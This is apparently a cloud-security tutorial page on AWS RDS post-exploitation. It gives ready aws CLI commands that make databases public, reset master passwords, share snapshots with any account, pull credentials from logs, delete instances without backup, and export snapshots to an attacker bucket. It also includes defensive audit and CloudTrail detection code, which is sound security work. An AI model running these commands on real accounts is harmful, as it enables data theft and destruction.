AWS - RDS Post Exploitation


RDS

For more information check:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

If an attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB and then restoring a publicly accessible DB from that snapshot.

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <snapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, he could simply create a DB from that snapshot in his own account.

If the attacker doesn't have rds:CreateDBSnapshot, he could still make other, already created snapshots public.

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to specific accounts: --values-to-add 111122223333 444455556666
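The sharing above is visible in the snapshot's restore attribute, so the quickest way to find out which snapshots in an account can already be restored by outsiders is to audit that attribute. The following is an added example, not HackTricks' code: it walks a list of DBSnapshotAttributesResult structures (the shape returned by `aws rds describe-db-snapshot-attributes` or boto3's describe_db_snapshot_attributes), flags every snapshot whose restore attribute contains `all` or an account outside an allowlist, and prints the modify-db-snapshot-attribute command (with --values-to-remove) that revokes the sharing. The sample results and the trusted account ID are constructed.

```python
"""Audit which RDS snapshots can be restored by other accounts.

Added example, not HackTricks' code. Input is a list of
DBSnapshotAttributesResult dicts (the describe-db-snapshot-attributes shape);
the sample results and the allowlist below are constructed.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed: the only external account allowed to restore our snapshots.
TRUSTED_ACCOUNTS = {"111122223333"}

# Constructed sample results, one per snapshot.
SAMPLE_RESULTS = [
    {"DBSnapshotIdentifier": "prod-nightly",
     "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": []}]},
    {"DBSnapshotIdentifier": "cloudgoat",
     "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": ["all"]}]},
    {"DBSnapshotIdentifier": "shared-with-partner",
     "DBSnapshotAttributes": [{"AttributeName": "restore",
                               "AttributeValues": ["111122223333", "444455556666"]}]},
]


@dataclass
class Finding:
    snapshot: str
    severity: str
    detail: str
    remediation: str  # CLI command that revokes the offending sharing


def restore_values(result: dict) -> list:
    """Return the account IDs (or 'all') listed in the snapshot's restore attribute."""
    for attr in result.get("DBSnapshotAttributes", []):
        if attr.get("AttributeName") == "restore":
            return list(attr.get("AttributeValues", []))
    return []


def audit_snapshot(result: dict, trusted=TRUSTED_ACCOUNTS) -> Optional[Finding]:
    """Flag a snapshot that is public or shared with an account outside the allowlist."""
    snap = result["DBSnapshotIdentifier"]
    values = restore_values(result)
    if "all" in values:
        return Finding(snap, "CRITICAL", "restorable by any AWS account",
                       f"aws rds modify-db-snapshot-attribute --db-snapshot-identifier {snap} "
                       f"--attribute-name restore --values-to-remove all")
    foreign = sorted(set(values) - set(trusted))
    if foreign:
        return Finding(snap, "HIGH", f"shared with untrusted accounts {foreign}",
                       f"aws rds modify-db-snapshot-attribute --db-snapshot-identifier {snap} "
                       f"--attribute-name restore --values-to-remove {' '.join(foreign)}")
    return None


def audit_all(results, trusted=TRUSTED_ACCOUNTS) -> list:
    """Audit every result and keep only the snapshots that need attention."""
    return [f for f in (audit_snapshot(r, trusted) for r in results) if f is not None]


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_RESULTS):
        print(f"[{finding.severity}] {finding.snapshot}: {finding.detail}")
        print(f"    fix: {finding.remediation}")
```

Feed it the real results by calling describe_db_snapshot_attributes for every snapshot returned by describe_db_snapshots; a snapshot that is shared with `all` is restorable by any AWS account, which is why it is rated above one shared with a specific unknown account.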

rds:DownloadDBLogFilePortion

An attacker with the rds:DownloadDBLogFilePortion permission can download portions of RDS log files. If sensitive data or access credentials have been logged by mistake, the attacker could use this information to escalate their privileges or perform unauthorized actions.

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

Potential impact: Access to sensitive information or unauthorized actions using leaked credentials.

rds:DeleteDBInstance

An attacker with these permissions could cause a DoS of existing RDS instances.

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Potential impact: Deletion of existing RDS instances and loss of data.

rds:StartExportTask

TODO: Test

An attacker with this permission could export a snapshot of an RDS instance to an S3 bucket. If the attacker controls the destination S3 bucket, they could access sensitive data within the exported snapshot.

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Potential impact: Access to sensitive data in the exported snapshot.
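Every call on this page (the public restore and password reset, the snapshot sharing, the log download, the deletion without a final snapshot and the export to S3) is recorded by CloudTrail, so they can be caught with a few event rules. The following is an added example, not HackTricks' code: check_event() applies one rule per technique to a CloudTrail record (a dict in CloudTrail's JSON shape) and returns a severity and message, and scan() runs it over a list of records. The records, the trusted-account allowlist and the known export bucket are constructed, and the requestParameters key names (dBInstanceIdentifier, publiclyAccessible, valuesToAdd, skipFinalSnapshot, s3BucketName and so on) are assumed to follow CloudTrail's camelCase convention, which is why they are matched case-insensitively.

```python
"""Flag the RDS API calls from this page in CloudTrail records.

Added example, not HackTricks' code. Records are dicts in CloudTrail's JSON
shape; the sample records, allowlist and export bucket below are constructed,
and requestParameters keys are assumed to be camelCase and matched
case-insensitively (RDS uses names such as dBInstanceIdentifier).
"""
from typing import Optional, Tuple

TRUSTED_ACCOUNTS = {"111122223333"}          # constructed: accounts allowed to restore our snapshots
KNOWN_EXPORT_BUCKETS = {"corp-rds-exports"}  # constructed: the only legitimate export target


def param(event: dict, name: str):
    """Case-insensitive lookup of a requestParameters field (None if absent)."""
    for key, value in (event.get("requestParameters") or {}).items():
        if key.lower() == name.lower():
            return value
    return None


def check_event(event: dict) -> Optional[Tuple[str, str]]:
    """Return (severity, message) when the record matches a technique on this page."""
    name = event.get("eventName", "")
    target = param(event, "dBInstanceIdentifier") or param(event, "dBSnapshotIdentifier") or "?"
    if name in ("RestoreDBInstanceFromDBSnapshot", "ModifyDBInstance") \
            and param(event, "publiclyAccessible") is True:
        return ("HIGH", f"{name}: {target} made publicly accessible")
    if name == "ModifyDBInstance" and param(event, "masterUserPassword") is not None:
        return ("HIGH", f"{name}: master password changed on {target}")
    if name == "ModifyDBSnapshotAttribute" and param(event, "attributeName") == "restore":
        added = set(param(event, "valuesToAdd") or [])
        if "all" in added:
            return ("CRITICAL", f"{name}: snapshot {target} shared with every AWS account")
        foreign = sorted(added - TRUSTED_ACCOUNTS)
        if foreign:
            return ("HIGH", f"{name}: snapshot {target} shared with untrusted accounts {foreign}")
    if name == "DownloadDBLogFilePortion":
        return ("MEDIUM", f"{name}: {param(event, 'logFileName')} read from {target}")
    if name == "DeleteDBInstance" and param(event, "skipFinalSnapshot") is True:
        return ("CRITICAL", f"{name}: {target} deleted without a final snapshot")
    if name == "StartExportTask" and param(event, "s3BucketName") not in KNOWN_EXPORT_BUCKETS:
        return ("CRITICAL", f"{name}: snapshot exported to unexpected bucket {param(event, 's3BucketName')}")
    return None


def scan(events) -> list:
    """Return (eventTime, actor ARN, severity, message) for every matching record."""
    hits = []
    for e in events:
        finding = check_event(e)
        if finding:
            hits.append((e.get("eventTime"), e.get("userIdentity", {}).get("arn"), *finding))
    return hits


# Constructed CloudTrail records: one benign read followed by one record per technique.
ACTOR = {"arn": "arn:aws:iam::111122223333:user/compromised-user"}
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventName": "DescribeDBInstances",
     "userIdentity": ACTOR, "requestParameters": None},
    {"eventTime": "2024-01-01T10:01:00Z", "eventName": "RestoreDBInstanceFromDBSnapshot",
     "userIdentity": ACTOR, "requestParameters": {"dBInstanceIdentifier": "new-db-not-malicious",
                                                  "dBSnapshotIdentifier": "cloudgoat",
                                                  "publiclyAccessible": True}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventName": "ModifyDBInstance",
     "userIdentity": ACTOR, "requestParameters": {"dBInstanceIdentifier": "new-db-not-malicious",
                                                  "masterUserPassword": "****",
                                                  "applyImmediately": True}},
    {"eventTime": "2024-01-01T10:03:00Z", "eventName": "ModifyDBSnapshotAttribute",
     "userIdentity": ACTOR, "requestParameters": {"dBSnapshotIdentifier": "cloudgoat",
                                                  "attributeName": "restore",
                                                  "valuesToAdd": ["all"]}},
    {"eventTime": "2024-01-01T10:04:00Z", "eventName": "DownloadDBLogFilePortion",
     "userIdentity": ACTOR, "requestParameters": {"dBInstanceIdentifier": "target-instance",
                                                  "logFileName": "error/mysql-error-running.log"}},
    {"eventTime": "2024-01-01T10:05:00Z", "eventName": "DeleteDBInstance",
     "userIdentity": ACTOR, "requestParameters": {"dBInstanceIdentifier": "target-instance",
                                                  "skipFinalSnapshot": True}},
    {"eventTime": "2024-01-01T10:06:00Z", "eventName": "StartExportTask",
     "userIdentity": ACTOR, "requestParameters": {"exportTaskIdentifier": "attacker-export-task",
                                                  "s3BucketName": "attacker-bucket"}},
]

if __name__ == "__main__":
    for when, who, severity, message in scan(SAMPLE_EVENTS):
        print(f"{when} [{severity}] {who}: {message}")
```

The rules key on the parameters that make each call dangerous rather than on the call alone: ModifyDBInstance is routine, but ModifyDBInstance that flips publiclyAccessible or resets the master password is not; DeleteDBInstance with skipFinalSnapshot and StartExportTask to a bucket that is not the organisation's export target are the variants worth paging on.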
